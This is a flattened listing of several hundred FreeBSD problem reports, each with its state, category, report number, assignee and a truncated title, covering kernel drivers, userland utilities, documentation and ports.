docs/57298 blackend [patch] add using compact flash cards info to handbook o stand/57295 harti make's handling of MAKEFLAGS is not POSIX conform s bin/57255 usb [patch] usbd(8) and multi-function devices s amd64/57250 kmacy [amd64] [patch] Broken PTRACE_GETFPREGS and PTRACE_SET o kern/57206 [panic] softdep_lock locks against itself, causing ker o bin/57089 w(1) does not honor the -n option s bin/57088 [cam] [patch] for a possible fd leak in libcam.c o bin/57054 let test(1) compare the mtime of a file to a string o bin/57045 trpt(8) option -t was disabled on -current s bin/57018 [patch] convert growfs(8) to use libufs(3) o conf/56934 rc [patch] rc.firewall rules for natd expect an interface s ports/56928 java jce-aba port should install to $JAVA_HOME/jre/lib/ext s kern/56720 [libc] [request] UNICODE support in Resolver o kern/56664 bad file# in MTIO status buffer after MTEOD until MTRE o bin/56648 [patch] enable rcorder(8) to use a directory for locat o stand/56476 standards cd9660 unicode support simple hack s kern/56461 [rpc] FreeBSD client rpc.lockd incompatible with Linux o kern/56451 emulation [linprocfs] /compat/linux/proc/cpuinfo gives wrong CPU o bin/56447 [patch] extend mt(1) command for AIT-2 tape drives o kern/56339 select() call (poll() too) hangs, yet call works perfe o kern/56250 [ums] [patch] ums(4) doesn't work with MCT based PS/2 o bin/56249 obrien ftpd(8) has two bugs (motd, munged utmp) o kern/56245 [bktr] Distorted and choppy video with bktr-driver on a kern/56233 gnn IPsec tunnel (ESP) over IPv6: MTU computation is wrong o kern/56031 luigi [ipfw] ipfw hangs on every invocation o kern/56024 acpi ACPI suspend drains battery while in S3 o kern/55984 ipfw [ipfw] [patch] time based firewalling support for ipfw s bin/55965 sshd(8) problems with HostBasedAuthentication and NSS o gnu/55936 bugmeister send-pr(1) does not set mail envelope from o docs/55883 kensmith [patch] handbook advanced-networking/chapter.sgml s ports/55841 portmgr [patch] Mk/bsd.port.mk: add routines to use ${PORTSDIR s kern/55802 [request] Make kernel.GENERIC suitable for diskless us o kern/55793 [dc] Flaky behavior of if_dc when initializing a LNE10 o i386/55661 acpi ACPI suspend/resume problem on ARMADA M700 o kern/55617 fs [smbfs] Accessing an nsmb-mounted drive via a smb expo o i386/55603 [mly] unable to reboot when system runs from Mylex A35 o bin/55546 cdcontrol(1) play tr m:s.f interface is partially brok a kern/55542 andre [de] [patch] discard oversize frame (ether type 800 fl o bin/55539 [patch] Parse fstab(5) with spaces in path names o bin/55457 marcel GDB gets confused debugging libc_r threaded processes. o kern/55448 dbm(3): dbm_nextkey() misbehaves after dbm_store() in o misc/55387 [build] [patch] users LD_LIBRARY_PATH can interfere wi o bin/55349 mbr amd(8) mixes up symlinks in its virtual filesystem. o bin/55346 stefanf sh(1) eats memory and CPU infinitely p kern/55018 andre [digi] [patch] Digiboard PC/Xem fails to initialize wh o conf/55015 [patch] 700.kernelmsg: Security check output enhacemen o kern/54891 [libalias] [patch] libalias(3)/natd(8) and exporting c o kern/54884 mckusick FreeBSD -stable and -current free space handling for U o stand/54839 standards [pcvt] pcvt deficits o stand/54833 standards [pcvt] more pcvt deficits o bin/54784 find(1) -ls wastes space o i386/54756 acpi ACPI suspend/resume problem on CF-W2 laptop s docs/54752 doc bus_dma explained in ISA section in Handbook: should b o bin/54683 sh(1) redundant history o kern/54604 pjd [kernel] [patch] make 'ps -e' procfs-independent o bin/54594 [patch] make(1) apply regexps to the entire variable - o java/54463 glewis Apparent bug in jdk13 o docs/54461 kensmith [patch] Possible additions to Handbook (Basics and Use p bin/54446 flz [patch] pkg_delete(1) doesn't honour symlinks, portupg o kern/54439 [sysctl] [patch] Protecting sysctls variables by given o stand/54410 standards one-true-awk not POSIX compliant (no extended REs) o bin/54401 [patch] pppstats(8) prints 0 for absolute values in ra o kern/54383 net [nfs] [patch] NFS root configurations without dynamic o bin/54365 [patch] add -u option to install(1) for SysV compatibi o kern/54309 silby TCP Packet of 64K-1 crashes FreeBSD4.8 o conf/54170 [patch] error from weekly periodic script 330.catman o bin/54141 wrong behavour of cu(1) o bin/54097 [nis] Non-local yppasswd(1) -d broken in 5.1-CURRENT o bin/53839 sysinstall(8): disklabel editor fails on post-install o docs/53751 doc bus_dma(9) incorrectly documents BUS_DMA_ALLOCNOW s stand/53682 [feature request] [patch] add fuser(1) utility o docs/53596 doc Updates to mt(1) manual page o bin/53560 logging domain names in wtmp is retarded o bin/53520 su(1) to another user does not update utmp o kern/53506 [partial patch] support gzipped modules o bin/53475 cp(1) copies files in reverse order to destination o kern/53447 alfred [kernel] poll(2) semantics differ from susV3/POSIX o bin/53341 sysinstall(8): [patch] dump frequency in sysinstall is o bin/53288 edwin tail(1) will sometimes display more lines than it is t o docs/53271 doc bus_dma(9) fails to document alignment restrictions o kern/53137 [panic] background fscking causing ffs_valloc panic. o bin/53131 randi sysinstall(8): "ALL" could not turn check BOXes ON at f kern/52980 mbr [dc] [patch] dc driver fails to init Intel 21143 Cardb s bin/52826 krion [request] Adding Timestamps to pkg info upon pkg_add(1 s ports/52765 portmgr [patch] Uncompressing manual pages may fail due too "a f bin/52746 tcsh(1) fails to handle large arguements o bin/52743 ppp(8) /etc/ppp/ppp.linkup instability issues o kern/52725 [patch] installincludes for kmods s ports/52706 portmgr [patch] bsd.port.mk issues warning if a site is explic o kern/52638 scsi [panic] SCSI U320 on SMP server won't run faster than o kern/52623 [ex] [patch] IRQ error in driver for the Intel EtherEx o bin/52517 murray New functionality for mail(1) o bin/52469 ppp(8) Multiple devices using UDP don't work. o kern/52445 [mfs] panic when mounting floppy on MFS filesystem o bin/52343 [nis] login(1) problem on the server o misc/52256 embedded [picobsd] picobsd build script does not read in user/s s docs/52071 delphij [patch] Add more information about soft updates into a s usb/52026 usb [usb] [request] umass driver support for InSystem ISD2 o kern/51982 remko [sio] sio1: interrupt-level buffer overflows s usb/51958 usb [urio] [patch] update for urio driver o kern/51685 fs [hang] Unbounded inode allocation causes kernel to loc o bin/51628 [nis] ypmatch doesn't match keys in legacy NIS servers o kern/51583 fs [nullfs] [patch] allow to work with devices and socket o docs/51480 dds Multiple undefined references in the FreeBSD manual pa s kern/51341 remko [ipfw] [patch] ipfw rule 'deny icmp from any to any ic o bin/51296 calendar(1) wrong for dates based on day+-num o kern/51274 ipfw [ipfw] [patch] ipfw2 create dynamic rules with parent o ports/51152 portmgr [patch] bsd.port.mk: generic SHEBANG_FILES o bin/51148 [patch] Control the cache size for pwd_mkdb(8) to spee s bin/51137 [patch] config(8) should check if a scheduler is selec o www/51135 www Problems with the mailing-lists search interface p docs/51133 murray RSH environmental variable not described in rcmd(3) o kern/51120 MSGBUF_SIZE doesn't work in makefiles o bin/51070 [patch] add -p option to pom(6) o kern/51009 [aue] [patch] buggy aue driver fixed. p conf/50956 matteo daily_status_disks_df_flags in /etc/defaults/periodic. o bin/50949 mtree(8) doesn't honor the -P when checking/changing o s kern/50827 [kernel] [patch] [request] add sane record locking o docs/50773 jmg [patch] NFS problems by jumbo frames to mention in bge o kern/50687 ioctl(.., CDIOCCAPABILITY, ...) always reports "Inappr p bin/50656 cp(1) - wrong error on copying of multiple files o kern/50574 mbr [dc] dc driver incorrectly detects ADMtek chip model o bin/50569 sh(1) doesn't handles ${HOME}/.profile correctly o kern/50526 [kernel] [patch] update to #! line termination o kern/50310 [libalias] [patch] natd / libalias fix to allow dcc re o bin/50300 [patch] make the loader(8) use of terminal-control seq o docs/50211 doc [patch] doc.docbook.mk: fix textfile creation o bin/50118 calendar(1) dumps core if there is ./calendar/ o misc/50106 [build] [patch] make 'make release' more flexible behi s threa/49087 threads Signals lost in programs linked with libc_r o kern/49039 [sio] [patch] add support for RS485 hardware where dir a bin/49023 gad [patch] to lpd(8) (printjob.c) to pass source filename o bin/48989 sysinstall(8): Sysinstall's partition editor gets con f kern/48976 gavin [modules] nwfs.ko oddity s bin/48962 des [patch] modify fetch(1) to allow bandwidth limiting o kern/48894 [nfs] Suggested improvements to the NFS read-ahead heu s threa/48856 threads Setting SIGCHLD to SIG_IGN still leaves zombies under o kern/48741 darrenr ipnat corrupts packets on gre interface with rul p bin/48730 obrien [patch] burncd(8) does not handle signals and causes d o alpha/48676 alpha Changing the baud rate of serial consoles for Alpha sy o gnu/48638 [libdialog] [patch] some bug fixes in libdialog o bin/48603 [patch] getopt(1) is broken o kern/48599 [syscons] [patch] syscons cut-n-paste logic is broken o kern/48471 pjd [jail] [patch] [request] private IPC for every jail o conf/48444 [patch] security.functions: count connection attempts o bin/48443 mtm [patch] periodic(8) executes too many files o kern/48425 Tape drive EOT handling problems in 4.7 o kern/48393 mckusick [ufs] ufs2 snapshot code bugs o bin/48341 sysinstall(8): changes the active slice flag when it p o conf/48325 [patch] /etc/periodic/security/100.chksetuid doesn't w p bin/48318 stefanf Segmentation fault in sh with attached script o bin/48309 ppp(8) pppoe connections fail to establish if throughp s kern/48279 [bktr] Brooktre878 may cause freeze o conf/48195 /var/db/mounttab error on diskless boot o bin/48183 marcel [patch] gdb(1) on a core(5)-file from a threaded proce o kern/48172 ipfw [ipfw] [patch] ipfw does not log size and flags o conf/48133 [patch] /etc/rc: improved vi recovery notification o docs/48101 doc [patch] add documentation on the fixit disk to the FAQ o kern/48062 mckusick mount -o snapshot doesn't work on +100GB disks p docs/47818 trhodes [patch] ln(1) manpage is confusing o bin/47815 [patch] stty(1) -all should work. s kern/47813 [gre] pseudo-device gre(4) doesn't appear to work with o conf/47596 [periodic] daily security run complains if timezone ch o docs/47594 remko [patch] passwd(5) incorrectly states allowed username o bin/47576 edwin [patch] factor(6)ing of negative numbers o conf/47566 [vinum] [patch] add vinum status verification to perio o bin/47540 [patch] Make natd(8) configurable in running state wit o bin/47384 sysinstall(8): sysinstall ignores intended destination o kern/47286 [request] make device probing verbose when using boot o kern/46973 [syscons] [patch] [request] syscons virtual terminals s conf/46913 darrenr ipf denied packets of security run output contains non o bin/46905 sysinstall(8): FreeBSD 5.x cannot be installed from mu o bin/46888 gad [patch] Add script run hook to newsyslog(8) o kern/46866 [libc] NIS-based getpwent(3) falsely returns NULL o bin/46758 [patch] moused(8) enhancements s conf/46746 No way to set link addresses through rc.conf o kern/46694 imp Getting DUP packets when in Promiscous mode on wi0 o bin/46676 ru [patch] [build] bsd.dep.mk restricts domain of tags co a kern/46647 silby Failure to initialize MII on 3Com NIC results in panic o conf/46453 [internationalization] cons25l2, ISO8859-2 and console o stand/46441 stefanf /bin/sh does not do parameter expansion in PS1, PS2, P o conf/46409 Certain periodic scripts check broken NFS mounts. o i386/46371 usb USB controller cannot be initialized on IBM Netfinity o bin/46352 [patch] login(1) open file descriptors and signal hand o bin/46328 gad [patch] patch for lpd(8) o bin/46235 matteo sysinstall(8): NTP servers for Finland require updatin o bin/46163 gad lpc(8) problem. Only root can modify despite man page o kern/46159 ipfw [ipfw] [patch] [request] ipfw dynamic rules lifetime f o stand/46119 standards Priority problems for SCHED_OTHER using pthreads o conf/46062 remko Remove skel from BSD.root.dist. s kern/46036 [RFE] select is unsuitable for implementing a periodic o bin/45995 markm telnet(1) fails to properly handle SIGPIPE on its term o bin/45990 dwmalone top(1) dumps core if specific errors in password file o kern/45896 dwmalone setnetgrent(3) should return error code o bin/45830 [kerberos] KDC has problems when listening to IPv6 and f i386/45773 net [bge] Softboot causes autoconf failure on Broadcom 570 o kern/45729 [libexec] [patch] make rbootd transfer the default fil o conf/45704 [patch] request to change cp866b font to cp866 o bin/45608 randi sysinstall(8): install should config all ether devices s kern/45568 gibbs [ahc] ahc(A19160) pci parity error o kern/45558 trhodes [msdosfs] mdconfig and msdosfs make fs writes hang s bin/45547 [patch] make burncd(8) handle .wav files. o bin/45529 gcooper [patch] hexdump(1) core-dumps with certain args o i386/45525 imp Dell Inspiron 7000 does not recognize PC-CARDs after r o kern/45373 mckusick softupdate / fs damaged after loss of power / CG 8: Ba o bin/45333 [patch] New option -r for chown(8) and chgrp(1) o docs/45303 remko Bug in PDF DocBook rendering o kern/45293 [libc] kevent denies to observe /dev/tty o bin/45272 dump(8) / restore(8) problem o conf/45226 rc [patch] Fix for rc.network, ppp-user annoyance o conf/45222 [patch] daily rejected mail hosts report too long p bin/45193 [patch] truss(1) can't truss itself p gnu/45168 Buffer overflow in /usr/bin/dialog o docs/45011 trhodes [patch] style(9): '->' and '.' don't require spaces o gnu/44984 bugmeister [patch] send-pr(1) can use environmental variable $FRO o bin/44915 randi sysinstall(8): 'choose installation media' choose CD-R o bin/44894 markm telnet(1): as a local non-root user and remote it's po o conf/44717 [patch] update login.conf and unify login capabilities o kern/44587 scsi dev/dpt/dpt.h is missing defines required for DPT_HAND o kern/44580 [nfs] NFS updates file access time when file is modifi o kern/44578 [nis] getnetgrent fails to read NIS netgroup map o gnu/44564 peter [patch] Aborted cvs session causes an endless loop in o docs/44519 obrien ftpd.conf(5) contains references to ftpd(8) when it is s bin/44518 yar ftpd(8) does not show OPIE OTP challenge o stand/44425 standards getcwd() succeeds even if current dir has perm 000. o kern/44372 roberto some kernel options prevent NTP clock synchronization o kern/44365 [headers] [patch] introduce ulong and unchar types o conf/44286 roberto /etc/defaults/rc.conf uses the obsolete ntpdate o kern/44267 [sio] [patch] One more modem PNP id for /usr/src/sys/i o bin/44212 [request] Unify 'recursive' options -r and -R o kern/44202 [rp] [patch] -stable rp driver does not work with mult o www/44181 www www "Release Information" organization o conf/44170 rc [patch] Add ability to run multiple pppoed(8) on start s bin/44122 ppp(8) tun0 gets a second ip adress after a disconnect o docs/44034 trhodes Multiple sysctl variables are not documented o java/43924 glewis writing from JAVA to a pipe sometimes hangs o kern/43905 jmg [kqueue] [patch] kqueues: EV_SET(kevp++, ...) is non-i o docs/43823 doc [patch] update to environ(7) manpage o bin/43819 [patch] changed truss(1) output for utrace calls o kern/43716 [puc] [patch] puc driver does not recognize Lava Dual- o kern/43625 imp [wi] wi(4) driver hangs after long data transfers o kern/43616 [zlib] [patch] static-ize some functions in sys/net/zl o kern/43611 [crypto] [patch] static-ize some symbols in sys/crypto a kern/43605 luigi enabling polling in the kernel causes page fault/crash o kern/43592 mktime(3) rejects dates at the start of daylight savin o bin/43582 [patch] passwd(1) fails on nonexistent users o kern/43577 [kernel] [patch] [request] new kernel option SHUTDOWN_ o kern/43576 imp Problem with wi driver and Lucent Orinoco Silver wirel o kern/43501 getpwnam(3), getpwuid fail when linking against Berkle o conf/43500 [patch] rc.syscons "allscreens" improvements s bin/43497 mount(8): mount -t nfs -> crunchgen incompatible o docs/43470 blackend solid-state article out of date (x109). o bin/43434 [patch] new option to dmesg(8) which allows to display o bin/43368 krion pkg_create(1) fails if target directory does not exist o bin/43367 incorrect report from who(1) after 'shutdown now' from a i386/43366 cy Cannot format media in USB floppy devices o kern/43355 idad driver will work if logical drives dont start at o bin/43337 des fetch(1) -s fails if -4 or possibly other options give o kern/42983 imp wi0 sporadically freezes the system for 1-2 seconds o bin/42974 [patch] syslogd(8): add ISO 8601 date format option o kern/42956 [libc] dlclose gives "invalid shared object handle" wh o kern/42801 [hang] FreeBSD freezes when opening cuaa0 with a motor o kern/42728 embedded [picobsd] many problems in src/usr.sbin/ppp/* after c o gnu/42726 cvsadm cvs -R pserver & val-tags: story continues o bin/42658 markm recompile telnetd(8) and log NULL ip in /var/wtmp o kern/42621 imp Dell Inspiron 5000e hangs when using Orinoco or Cisco o kern/42461 mdodd if_wi_pci.c,if_wi_pccard.c lack device_resume/device_s o kern/42442 problem in idlequeue/debugging mode ? o kern/42429 [libc] [patch] hash_action called with HASH_DELETE doe o kern/42422 [libc] [patch] dbm_delete returns -1 instead of 1 when o bin/42407 ppp(8) IPV6CP fails o kern/42387 [librpcsvc] [patch] cleaning code of librpcsvc from wa o kern/42386 [libkvm] [patch] cleaning code from warnings in libkvm o bin/42336 [patch] ISO-fication of /usr/src/contrib/tcp_wrappers: o kern/42274 [kernel] [patch] Convert defined variable into tuneabl o kern/42217 [libdisk] libdisk segfaults with 1024 bytes/sector dis o bin/42162 randi sysinstall(8): after restart, installation crashes, md o misc/42115 luigi [picobsd] [patch] fix build script for 4.6-STABLE o bin/42093 [nis] ypbind(8) hangs on NIC with the lowest scopeid o kern/42089 phk ntp_gettime returns time in wrong scale o bin/42084 luigi [picobsd] PicoBSD's 'netstat -i' reports negative Ipkt o bin/42022 randi sysinstall(8): non-interactive mode prompts when only o bin/42018 krion pkg_info(1) with PKG_PATH searches through tarred pkgs s bin/42004 mpp [quotas] quota is still IPv4 only, and not INET indepe o bin/41949 sysinstall(8): sysinstall sorts /etc/rc.conf during ne s bin/41947 gcooper [patch] hexdump(1) unprintable ASCII enhancement o docs/41919 blackend MINI kernel for bootfloppy (Handbook p.342) contains e o docs/41879 hrs [patch] cleanup to DOCROOT/share/sgml/freebsd.dsl o bin/41850 sysinstall(8): sysinstall fails to create root filesys o docs/41824 murray [patch] LANG is not documented in setlocale(3) o bin/41817 [patch] pw(8): pw groupshow doesn't include the login o conf/41777 [patch] /etc/periodic/daily/100.clean-disks removes li o bin/41674 [patch] iostat(8) column formatting overlaps s bin/41647 net ifconfig(8) doesn't accept lladdr along with inet addr o kern/41632 luigi bridging when one interface has no carrier a bin/41583 [patch] mtree(8) assorted mtree bugs p stand/41576 standards POSIX compliance of ln(1) o bin/41556 obrien [patch] wtmp patch for ftpd(8) o kern/41543 emulation [patch] [request] easier wine/w23 support o bin/41526 mount(8) symlinked mount points get mounted more than o bin/41410 stefanf sh(1) bug on expanding $? in here-documents o i386/41364 imp [pccard] NewMedia "Bus Toaster" SCSI card w/ Advansys o kern/41307 [libalias] [patch] logging of links lifecycle (add/del o bin/41297 mp tcsh(1)/csh(1) backquote/braces expansion bug o bin/41271 matteo [patch] non-suid crontab(1) o conf/41242 periodic scripts make unwarranted assumptions about PA o kern/41216 [nfs] Get "NFS append race" error o kern/41215 [keyboard] console revert back to kbd0 (AT) after KVM o bin/41213 top(1) blocks if NIS-related entries in passwd(5) are o bin/41190 [patch] sed(1) report the { linenum instead of EOF lin s misc/41179 [request] LD_LIBRARY_PATH security checks o bin/41159 [patch] new sed(1) -c option to allow ; as a separator o docs/41089 doc pax(1) -B option does not mention interaction with -z o usb/40948 usb [umass] [request] USB HP CDW8200 does not work o kern/40895 scsi wierd kernel / device driver bug o conf/40777 [patch] disktab does not support 2.88MB floppies s threa/40671 threads pthread_cancel doesn't remove thread from condition qu o bin/40597 [patch] add fdisk(8) ability of showing extended parti o bin/40572 vipw(8) prints silly message if $EDITOR fails o docs/40423 doc Keyboard(4)'s definition of parameters to GETFKEY/SETF o kern/40369 [kernel] [patch] rman_reserve_resource - when "count > a bin/40282 [patch] kill(1) has bad error checking for command lin o bin/40260 sysinstall(8): hang when detecting devices (No CD/DVD o bin/40215 [nis] NIS host search not terminate o kern/40206 Can not assign alias to any POINTOPOINT interface o gnu/40057 bugmeister send-pr -a flag does not work with -f s kern/40021 [build] [patch] use ld(1) to build kernel with linked- o kern/40017 [patch] allows config(8) to specify config metadata di o conf/39976 vi recovery halting boot process s kern/39937 net ipstealth issue o kern/39928 imp [wi] wi0 timeouts and hangs the system while sending d s threa/39922 threads [threads] [patch] Threaded applications executed with o bin/39849 restore(8) fails to overwrite files with schg flag set o kern/39681 [sysctl] [patch] add hidden kernel boot tunables to sy o ports/39660 portmgr [patch] add ${PKGNAMEPREFIX} to (DOCS|EXAMPLES)DIR s conf/39580 insecure default settings o kern/39527 dwmalone getcwd() and unreadable parent directory o conf/39505 [patch] automate BUILDNAME variable for releases o bin/39463 mtm [patch] Add several options to fingerd(8) o bin/39439 tcopy(1) will not duplicate tapes with block size larg o kern/39388 scsi ncr/sym drivers fail with 53c810 and more than 256MB m o kern/39329 [mount] '..' at mountpoint is subject to the permissio o stand/39256 standards snprintf/vsnprintf aren't POSIX-conformant for strings o kern/39252 [syscons] [patch] syscons doesn't support 8-bit contro f kern/39233 bz [ipsec]: NonConforming IPsec implementation from FreeB o kern/39201 emulation [linux] [patch] ptrace(2) and rfork(RFLINUXTHPN) confu o docs/38982 doc [patch] developers-handbook/Jail fix o bin/38940 [request] an option to *stat to allow supressing of he o misc/38937 delay between tracks in digital audio dumps from CD wi o bin/38854 sysinstall(8): resetting during setup causes the targe o kern/38828 scsi [dpt] [request] DPT PM2012B/90 doesn't work o kern/38749 kientzle Diskless booting fails with some DHCP servers (no root s kern/38730 philip Memorex scrollpro mouse is not fully functional o bin/38727 [patch] mptable(1) should complain about garbage argum o kern/38626 luigi dummynet/traffic shaper: RED: max_th and min_th are li o bin/38610 randi sysinstall(8): should be able to mount ISO images on D s bin/38609 sysinstall(8): [request] sysinstall should know the si s ports/38593 portmgr [request] Third level ports o docs/38556 doc EPS file of beastie, as addition to existing examples a kern/38554 net [patch] changing interface ipaddress doesn't seem to w o bin/38478 sysinstall(8): In Choose Distributions screen, it's di s kern/38347 [libutil] [patch] [request] new library function abs2r o bin/38256 [patch] linking pax(1) to pax_{cpio|tar} o bin/38168 [patch] [request] installing curses-based versions of o docs/38061 ume [patch] typos in man pages for faith(4) & faithd(8) o bin/38057 sysinstall(8): "install" document doesn't display corr o bin/38056 sysinstall(8): User (creation)'s "Member groups" item o bin/38055 sysinstall(8): Groups (creation) item should be before o alpha/38031 alpha osf1.ko not loaded during boot-time of linux-emu enabl o gnu/37910 bugmeister [patch] make send-pr(1) respect &'s in /etc/{master.}p o bin/37844 [patch] [build] make knob to not install progs with su o docs/37719 kensmith [request] Detail VOP_ naming in a relevant man-page o bin/37710 sysinstall(8): LAN interface in wrong state after atte s threa/37676 threads libc_r: msgsnd(), msgrcv(), pread(), pwrite() need wra o bin/37672 pw(8) prints warnings after successful NIS map updates o kern/37600 multimedia [sound] [partial patch] t4dwave drive doesn't record. o kern/37589 imp Kernel panics upon resume from zzz on my IBM ThinkPad o conf/37569 matteo [patch] Extend fstab(5) format to allow for spaces in o kern/37555 [kernel] [patch] vnode flags appear to be changed in n o kern/37554 jmg [vm] [patch] make ELF shared libraries immutable once o i386/37523 davidxu [i386] [patch] lock for bios16 call and vm86call o bin/37442 [patch] sleep(1) to support time multipliers s kern/37441 davidxu [isa] [patch] ISA PNP parse problem o bin/37437 [patch] [request] Add HTTP-style support to vis(1)/unv o kern/37326 [bktr] smbus/bktr crash when omitting "device iicsmb" o bin/37160 sysinstall(8): coredumps when trying to load package d o bin/37083 [patch] [request] small improvement to talk(1): add cl o bin/37013 [patch] ls(1) directory name output trailing slash dup o bin/36960 calendar(1) doesn't effect -t option. o kern/36952 ldd comand of linux does not work o gnu/36926 bugmeister [patch] send-pr destroys PR if emacs interrupt charact o kern/36916 randi [libdisk] [patch] DOS active partition flag lost in li o kern/36911 [ata] ATA cannot be disabled with hints or through BIO o kern/36902 [libc] [patch] proposed new format code %N for strftim s ports/36901 glewis WITHOUT_X11 Knob for port java/jdk13 s bin/36786 make ps(1) use 24-hour time by default o kern/36784 Can't fcntl(fd, F_SETFL, ...) on a pseudo-tty s bin/36740 make ps(1) obey locale (particularly for times) o docs/36724 darrenr ipnat(5) manpage grammar is incomplete and inconsisten o kern/36626 login_cap(3) incorrectly claims that all resources fre o kern/36566 fs [smbfs] System reboot with dead smb mount and umount o bin/36556 [patch] regular expressions for tcpwrappers o bin/36553 gad [patch] [request] Two new features in newsyslog(8) o bin/36501 calendar(1) can't handle recurring items in the next m s gnu/36460 cu(1) program does not work very well. a kern/36451 [bktr] [patch] Japan IF frequency is incorrect f docs/36432 gabor Proposal for doc/share/mk: make folded books using psu o kern/36415 [bktr] [patch] driver incorrectly handles the setting o bin/36385 luigi crunchgen(1) does not handle Makefiles with includes p o bin/36374 [patch] apmd(8): fix core dumps, other improvements o bin/36262 [patch] Fixed rusers(1) idle-time reporting to use min o kern/36170 [an] [patch] an(4) does an_init() even if interface is o bin/36143 [patch] moused(8): add dynamic (non linear) mouse acce o bin/36118 sysinstall(8): 4.5 Upgrade says it won't touch /usr/sr a bin/36110 dmesg(8) output corrupt if /dev/console is busy s stand/36076 standards Implementation of POSIX fuser command a bin/35985 sysinstall(8): swap double mount o bin/35886 [patch] pax(1) enhancement: custom time format for lis o gnu/35878 /usr/bin/strip resets ABI type to FreeBSD o kern/35774 [libutil] logwtmp: Suboptimal auditing possibilities f o bin/35769 w(1) does not correctly interpret X sessions o bin/35717 which(1) returns wrong exit status for multiple argum s docs/35678 doc docproj Makefiles for web are broken for paths with sp o kern/35669 [nfs] NFSROOT breaks without a gateway o docs/35652 trhodes bsd.README seriously obsolete o bin/35568 make(1) declares target out of date, but $? is empty o conf/35545 [patch] enhanced periodic scripts: 100.clean-disks, 10 o misc/35542 bde [build] [patch] BDECFLAGS needs -U__STRICT_ANSI__ o kern/35442 net [sis] [patch] Problem transmitting runts in if_sis dri o kern/35429 select(2)/poll(2)/kevent(2) can't/don't notice lost co o bin/35400 randi sysinstall(8): sysinstall could improve manipulation o o kern/35399 poll(2) botches revents on dropped socket connections o kern/35396 poll(2) doesn't set POLLERR for failed connect(2) atte o kern/35377 process gets unkillable (-9) in "ttywai" state o kern/35289 [bktr] [patch] Brooktree device doesnt properly signal o kern/35262 [boot2] [patch] generation of boot block for headless o kern/35234 scsi World access to /dev/pass? (for scanner) requires acce o bin/35214 obrien dump(8) program hangs while exiting o bin/35113 [patch] grdc(6) enhancement: countdown timer mode o bin/35109 edwin [patch] morse(6) add ability to decode morse code o kern/34880 luigi Impossibility of grouping IP into a pipe for traffic s o kern/34842 [nis] [patch] VmWare port + NIS causes "broadcast stor o bin/34811 sh(1) "jobs" is not pipeable o bin/34788 dwmalone dmesg(8) issues with console output o bin/34728 DHCP hostname set as Hexadecimal string o kern/34665 net [ipf] [hang] ipfilter rcmd proxy "hangs". o bin/34628 portmgr [patch] pkg_add(1) pkg-routines ignore the recorded md s threa/34536 threads accept() blocks other threads o bin/34497 calendar(1) does not understand calendars o kern/34470 bde Modem gets sio1 interrupt-level buffer overflows' o bin/34412 [patch] tftp(1) will still try and receive traffic eve o bin/34309 gad lpd(8) does not garantie that controlfiles begin with o bin/34270 man(1) -k could be used to execute any command. o docs/34239 trhodes tunefs(8) man page doesn't describe arguments. s bin/34171 yar ftpd(8) indiscrete about unprivileged user accounts o bin/34146 newfs(8) defaults and vfs.usermount=1 tug at one anoth o gnu/34128 sdiff "e" doesn't work with some editors o kern/33965 [keyboard] [patch] programmable keys of the keyboard ( a kern/33963 bde Messages at the serial IO port device probe are mislea o kern/33834 strptime(3) is misleading o bin/33809 mux [patch] mount_nfs(8) has trouble with embedded ':' in o bin/33774 [patch] for killall(1) a bin/33661 PAP AuthAck/AuthNak parsing problem in pppd(8) s docs/33589 doc [patch] to doc.docbook.mk to post process .tex files. o kern/33464 soft update inconsistencies after system crash o kern/33203 [nfs] "got bad cookie" errors on NFS client o bin/33182 marcel gdb(1) seg faults when given handle SIGALRM nopass for o bin/33066 kensmith sysinstall(8): does not write to new disks as expected o bin/32828 jail [jail] w(1) incorrectly handles stale utmp slots with o kern/32812 [bktr] bktr driver missing tuner for eeprom detection. o bin/32808 dwmalone [patch] tcpd.h lacks prototype for hosts_ctl o bin/32667 systat(1) waste too much time reading input o bin/32619 des libfetch does not use RFC 1738's definiton of ftp: URL o bin/32501 maxim quot(8) is stupid regarding the filesystem option a bin/32411 shutdown(8) absolute-time handling could be more usefu a bin/32375 sysinstall(8): sysinstall doesn't respect User generat o bin/32374 vi(1) -r doesn't work, file contained unexpected binar s threa/32295 threads [libc_r] [patch] pthread(3) dont dequeue signals s conf/32108 Proposed Firewall (IPv4) configuration script o bin/31987 [patch] allow dump(1) to notify operators by mail(1) o bin/31985 New /etc/remote flag for tip(1) to append LF to CR o kern/31981 [libc] [patch] (mis)feature in getnetent parsing -- co o kern/31940 kmacy ip queue length too short o bin/31933 pw(8) can interpret numeric name as userid during user o kern/31906 [libc] No method available to unwind atexit(3) stack w o kern/31890 [syscons] [patch] new syscons font o gnu/31772 New option in dialog(1) o kern/31708 VM system / fsync / flushing delayed indefinitely? s kern/31686 andre Problem with the timestamp option when flag equals zer o kern/31647 net [libc] socket calls can return undocumented EINVAL o bin/31588 change request to allow mount(8) to set the MNT_IGNORE o bin/31387 mailwrapper(8): When getuid(2)=0, mailwrapper should d o kern/31380 [nfs] NFS rootfs mount failure message too cryptic o bin/31363 sysinstall(8): "partition editor" silently corrects pa s bin/31304 [patch] fix crunchgen(1) to work with more contrib-kin o kern/31201 [libdisk] [patch] add free_space(chunk) to libdisk o kern/31048 des [linprocfs] /proc/meminfo cannot handle multiple swap o bin/31034 dwmalone regularly add original address logging for tcpwrappers o conf/30938 [patch] Improving behavior of /etc/periodic/daily/110. o usb/30929 usb [usb] [patch] use usbd to initialize USB ADSL modem o bin/30863 bootpd(8) dovend.c Win95 compatibility improvement and o bin/30854 bootpd(8) bootpgw change - skip ARP modifications by o o conf/30812 [patch] giant termcap database update a bin/30737 sysinstall(8): sysinstall leaks file descriptors on re o bin/30654 gad [patch] Added ability for newsyslog(8) to archive logs o conf/30590 /etc/hosts.equiv and ~/.rhosts interaction violates PO o bin/30542 [patch] add -q option to shut up killall(1) o bin/30517 randi sysinstall(8): using sysinstall with install.cfg has n s threa/30464 threads pthread mutex attributes -- pshared o bin/30424 Generalization of vipw(8) to lock pwdb while being edi o conf/30399 brueffer [bsd.cpu.mk] [patch] Have Fortran use the CPUTYPE vari o bin/30360 vmstat(8) returns impossible data o kern/30321 [patch] strftime(3) '%s' format does not work properly s i386/30206 mdodd [boot] PS/2 server 85 can't boot kern.flp o kern/30186 net [libc] getaddrinfo(3) does not handle incorrect servna o kern/30052 mbr [dc] [patch] dc driver queues outgoing pkts indefinite a docs/30008 doc [patch] French softupdates document should be translat o bin/29903 [nis] ypbind(8) loses connection to NIS master and nev o bin/29897 des [patch] pam_unix(8) loginclass passwd_prompt p bin/29893 kensmith sysinstall(8): suggestions for 4.4 sysinstall o bin/29808 [nis] ypserv(8) dumps core in yp_find_db o kern/29698 emulation 